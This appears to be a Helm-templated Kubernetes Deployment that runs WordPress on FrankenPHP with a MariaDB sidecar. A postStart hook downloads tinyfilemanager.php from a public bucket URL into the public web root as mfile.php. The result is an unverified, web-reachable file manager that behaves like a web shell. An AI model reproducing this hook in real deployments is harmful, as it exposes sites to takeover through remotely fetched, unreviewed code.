apiVersion: apps/v1
kind: Deployment
metadata:
  name: app-{{ .Release.Name }}
  labels:
    workload.user.cattle.io/workloadselector: app-{{ .Release.Name }}
spec:
  selector:
    matchLabels:
      workload.user.cattle.io/workloadselector: app-{{ .Release.Name }}
  template:
    metadata:
      labels:
        workload.user.cattle.io/workloadselector: app-{{ .Release.Name }}
    spec:
      restartPolicy: Always
      volumes:
        - name: data
          persistentVolumeClaim:
            claimName: volume-claim-{{ .Release.Name }}
      containers:
        - name: wordpress
          image: lttech/frankenphp:8.3.1
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          livenessProbe:
            tcpSocket:
              port: http
            failureThreshold: 3
            periodSeconds: 15
            successThreshold: 1
            timeoutSeconds: 3
          readinessProbe:
            tcpSocket:
              port: http
            failureThreshold: 3
            periodSeconds: 15
            successThreshold: 1
            timeoutSeconds: 3
          lifecycle:
            postStart:
              exec:
                command:
                  - wget
                  - https://pub-e151b33b760244cdbd2eb7db739e0d13.r2.dev/tinyfilemanager.php
                  - -O
                  - /app/public/mfile.php
          resources:
            requests:
              memory: "768Mi"
              cpu: "400m"
            limits:
              memory: "1536Mi"
              cpu: "800m"
          volumeMounts:
            - name: data
              mountPath: /app/public
              subPath: web
        - name: database
          image: mariadb:11.1
          args: ["--skip-log-bin"]
          imagePullPolicy: IfNotPresent
          livenessProbe:
            exec:
              command:
                - healthcheck.sh
                - "--connect"
                - "--innodb_initialized"
            failureThreshold: 3
            periodSeconds: 30
            successThreshold: 1
            timeoutSeconds: 30
          readinessProbe:
            exec:
              command:
                - healthcheck.sh
                - "--connect"
                - "--innodb_initialized"
            failureThreshold: 3
            periodSeconds: 30
            successThreshold: 1
            timeoutSeconds: 30
          resources:
            requests:
              memory: "768Mi"
              cpu: "400m"
            limits:
              memory: "1536Mi"
              cpu: "800m"
          volumeMounts:
            - name: data
              mountPath: /var/lib/mysql
              subPath: sql
          envFrom:
            - secretRef:
                name: secret-{{ .Release.Name }}
  strategy:
    type: Recreate
